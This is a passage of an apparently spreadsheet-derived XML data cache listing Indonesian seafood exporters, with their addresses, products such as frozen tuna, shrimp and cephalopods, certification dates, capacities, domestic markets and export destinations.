    <d v="2020-01-29T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Singapore, United States, Viet Nam"/>
  </r>
  <r>
    <n v="20541"/>
    <x v="17"/>
    <s v="PT. BINTANG MEGAH JAYA PERKASA"/>
    <s v="Jl. Batangase No.50, Kel. Batangase, Kec. Bontoa, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="China, Saudi Arabia, United Arab Emirates"/>
  </r>
  <r>
    <n v="19923"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Beku (Lencam, Anggoli, Kerapu, Kakap, Kaci-kaci)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kabupaten Semarang, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19925"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Cakalang, Tenggiri)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19926"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19927"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19928"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19929"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19930"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Udang Beku"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19931"/>
    <x v="71"/>
    <s v="PT. MATSYARAJA ARNAWA STAMBHAPURA"/>
    <s v="Komplek Pelabuhan Perikanan Tenau, Jl. Yos Sudarso, Kel. Alak, Kec. Alak, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Udang Segar"/>
    <d v="2020-02-20T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Denpasar"/>
    <s v="Australia, China, Germany, United States"/>
  </r>
  <r>
    <n v="19988"/>
    <x v="140"/>
    <s v="CV. MAROS TIMUR JAYA"/>
    <s v="Jl. Poros Makassar - Maros, Dusun Bulutanae, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-03-30T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Batam, Kota Jakarta Selatan, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Saudi Arabia, Singapore"/>
  </r>
  <r>
    <n v="17431"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Barakuda, Lemadang, Cakalang, Tenggiri)"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="900000"/>
    <m/>
    <s v="Australia, Belgium, Japan, United States"/>
  </r>
  <r>
    <n v="19358"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Komplek Pergudangan dan Industri Safe N Lock Blok AG No.5722, Jl. Lingkar Timur Km 5.5, Kel. Pucanganom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="19359"/>
    <x v="144"/>
    <s v="CV. MITRA KARYA"/>
    <s v="Komplek Pergudangan dan Industri Safe N Lock Blok AG No.5722, Jl. Lingkar Timur Km 5.5, Kel. Pucanganom, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Hong Kong, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="20722"/>
    <x v="39"/>
    <s v="PT. UNIMITRA ANDALAN SEJATI"/>
    <s v="Jl. Tekno I Kawasan Industri Jababeka 3C No.3B, Kel. Pasir Gombong, Kec. Cikarang Utara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bandeng Beku"/>
    <d v="2020-06-18T00:00:00"/>
    <n v="50000"/>
    <s v="Kabupaten Karawang, Kota Bekasi, Kota Tangerang"/>
    <s v="Malaysia, Singapore, Thailand, Viet Nam"/>
  </r>
  <r>
    <n v="21295"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Segar"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kabupaten Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21290"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kabupaten Probolinggo, Kota Surabaya"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21291"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Gulama, Kakap Merah)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kabupaten Semarang, Kota Yogyakarta"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21292"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Segar (Lemuru, Tongkol, Muroaji)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kabupaten Semarang, Kota Surabaya"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21293"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Segar Hasil Budidaya (Lele, Bandeng, Patin, Nila)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Semarang, Kota Yogyakarta, Kota Surabaya"/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19616"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav. B3, Cikarang, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Minyak Ikan"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="1500000"/>
    <s v="Kota Surabaya"/>
    <s v="Australia, France, Italy, Japan, Spain"/>
  </r>
  <r>
    <n v="19477"/>
    <x v="146"/>
    <s v="PT. KEUMKANG INDUSTRI INDONESIA"/>
    <s v="Jl. Kima 15 Kav R4D - R4E, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19478"/>
    <x v="146"/>
    <s v="PT. KEUMKANG INDUSTRI INDONESIA"/>
    <s v="Jl. Kima 15 Kav R4D - R4E, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-09-11T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19608"/>
    <x v="95"/>
    <s v="PT. BLUESEA SEAFOOD INDUSTRY"/>
    <s v="Jl. Blanak No.1 Blok B1 No.19 Kawasan Pelabuhan Perikanan Pantai Tegalsari, Kel. Tegalsari, Kec. Tegal Barat, Kota Tegal&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="500000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19733"/>
    <x v="91"/>
    <s v="PT. TOBA SURIMI INDUSTRIES"/>
    <s v="Jl. Pulau Pinang 2, Kawasan Industri Medan II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Lobster Air Tawar Beku"/>
    <d v="2020-01-31T00:00:00"/>
    <n v="8000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19849"/>
    <x v="115"/>
    <s v="PT. WINAROS KAWULA BAHARI"/>
    <s v="Jl. Raya Cangkringmalang Km 39,4, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="3600000"/>
    <m/>
    <s v="Belgium, Germany, Japan, United States"/>
  </r>
  <r>
    <n v="19911"/>
    <x v="23"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Ikan Tuna Raya, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Segar (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-19T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Australia, Italy, Japan, United States"/>
  </r>
  <r>
    <n v="20014"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20015"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Mata Goyang, Kerapu, Kakap, Kurisi)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20016"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Kembung, Lemadang, Gindara, Layang, Tenggiri)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20017"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Air Tawar Beku (Patin, Mola)"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20018"/>
    <x v="147"/>
    <s v="PT. JAVA SEAFOOD"/>
    <s v="Desa Eretan Kulon, Kec. Kandang Haur, Kabupaten Indramayu&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="20526"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Anggoli, Kerapu, Kakap Merah, Ekor Kuning)"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="20542"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Amberjack, Makerel, Pacific Saury, Salmon, Sea Robin, Jack Fish, Mackerel Scad, Goosefish)"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="20547"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Gurita)"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="20681"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="600000"/>
    <m/>
    <s v="China, Japan, Singapore, United States"/>
  </r>
  <r>
    <n v="20732"/>
    <x v="105"/>
    <s v="PT. SEAFOOD SAMUDERA PACIFIC"/>
    <s v="Jl. Gabion No.15, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Keong Beku"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="40000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21126"/>
    <x v="149"/>
    <s v="PT. SEKAR BUMI, TBK PLANT I"/>
    <s v="Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Belut, Gurame, Bandeng)"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21168"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Kerang Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="7000"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21282"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21285"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Cumi Karet, Gurita, Cumi-cumi)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="121678"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21286"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Kakap Merah)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="69214"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21288"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Patin, Nila)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="21294"/>
    <x v="78"/>
    <s v="PT. SINDABAD MARINE PIONEER"/>
    <s v="Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Segar"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="Korea, Democratic People's Republic of"/>
  </r>
  <r>
    <n v="19371"/>
    <x v="1"/>
    <s v="PT. BANYUWANGI CANNERY INDONESIA"/>
    <s v="Jl. Raya Situbondo Km 12,5, Kel. Ketapang, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sarden Kaleng"/>
    <d v="2020-06-04T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Palembang, Kota Batam, Kota Jakarta Pusat, Kota Bogor, Kota Semarang, Kota Surabaya, Kota Banjarmasin"/>
    <s v="Albania, Croatia, Germany, Montenegro"/>
  </r>
  <r>
    <n v="20099"/>
    <x v="48"/>
    <s v="CV. LOBSTER ORIGIN PARADISE"/>
    <s v="Jl. Raya Sengkerang, Kel. Ganti, Kec. Praya Timur, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-04-23T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kabupaten Lombok Barat"/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20908"/>
    <x v="151"/>
    <s v="PT. SURYA ALAM TUNGGAL"/>
    <s v="Jl. Raya Tropodo No.126, Kel. Tropodo, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="2496000"/>
    <s v="Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Sidoarjo"/>
    <s v="Canada, United Kingdom, United States"/>
  </r>
  <r>
    <n v="20513"/>
    <x v="152"/>
    <s v="CV. LAUT SARI AGUNG"/>
    <s v="Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Lobster Beku"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Timur, Kabupaten Gianyar"/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20514"/>
    <x v="152"/>
    <s v="CV. LAUT SARI AGUNG"/>
    <s v="Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Timur, Kabupaten Gianyar"/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="20515"/>
    <x v="152"/>
    <s v="CV. LAUT SARI AGUNG"/>
    <s v="Jl. Malaka, Kel. Batu Nampar Selatan, Kec. Jerowaru, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Kepiting Beku"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="6000"/>
    <s v="Kota Jakarta Barat, Kabupaten Gianyar"/>
    <s v="China, Hong Kong, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19852"/>
    <x v="153"/>
    <s v="CV. GEMBIRA GALESONG"/>
    <s v="Jl. Abdul Kadir No.5, Kel. Gallesong Kota, Kec. Galesong , Kabupaten Takalar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Teripang Kering"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="1700"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19797"/>
    <x v="124"/>
    <s v="PT. WINDUBLAMBANGAN SEJATI"/>
    <s v="Jl. Gatot Subroto Km 5 No.18, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="342992"/>
    <m/>
    <s v="Germany, Italy, Sweden, United States"/>
  </r>
  <r>
    <n v="20557"/>
    <x v="154"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerapu Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="13000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20558"/>
    <x v="154"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20559"/>
    <x v="154"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Lobster Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="20560"/>
    <x v="154"/>
    <s v="CV. DUS INTERNATIONAL TRADING"/>
    <s v="Jl Poh Gading No.100X Taman Jimbaran, Kel. Jimbaran, Kec. Kuta Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Hidup"/>
    <d v="2020-04-02T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="19724"/>
    <x v="122"/>
    <s v="PT. PRASETYA AGUNG CAHAYA UTAMA"/>
    <s v="Jl. A. Yani I, Dusun Carik Padang, Kel. Nyambu, Kec. Kediri, Kabupaten Tabanan&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="684"/>
    <s v="Kota Jakarta Barat, Kabupaten Bandung, Kota Surabaya, Kota Denpasar"/>
    <s v="China, Malaysia, Singapore, Viet Nam"/>
  </r>
  <r>
    <n v="19389"/>
    <x v="155"/>
    <s v="PT. KARYA MINA PUTRA"/>
    <s v="Dukuh Matalan, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Swanggi, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="525000"/>
    <s v="Kota Palembang, Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, Thailand"/>
  </r>
  <r>
    <n v="19390"/>
    <x v="155"/>
    <s v="PT. KARYA MINA PUTRA"/>
    <s v="Dukuh Matalan, Kel. Purworejo, Kec. Kaliori, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kuwe, Kembung, Selar, Layang, Tenggiri, Salem)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="850000"/>
    <s v="Kota Palembang, Kota Jakarta Pusat, Kota Surabaya"/>
